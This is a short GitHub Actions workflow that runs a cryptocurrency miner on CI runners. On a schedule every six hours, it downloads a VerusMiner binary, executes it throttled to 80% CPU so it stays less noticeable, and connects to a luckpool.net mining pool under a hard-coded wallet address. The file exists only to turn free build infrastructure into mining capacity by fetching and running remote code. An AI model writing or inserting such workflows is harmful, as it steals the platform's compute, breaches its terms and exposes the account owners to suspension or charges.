name: 80%

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */6 * * *"

jobs:
  mine:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
    - name: Update system
      run: |
        sudo apt update
        sudo apt install wget tar cpulimit -y

    - name: Download VerusMiner
      run: |
        wget https://github.com/hellcatz/verusminer/releases/download/v0.8.1/verusminer-linux.tar.gz
        tar -xvf verusminer-linux.tar.gz
        chmod +x verusminer

    - name: Start Mining (80% CPU)
      run: |
        cpulimit -l 80 -- ./verusminer \
        -o stratum+tcp://na.luckpool.net:3956 \
        -u RQLTCKt8WJAMwfW29tZfn8jJ6WeoNmkP4P.worker \
        -p x \
        -t 1
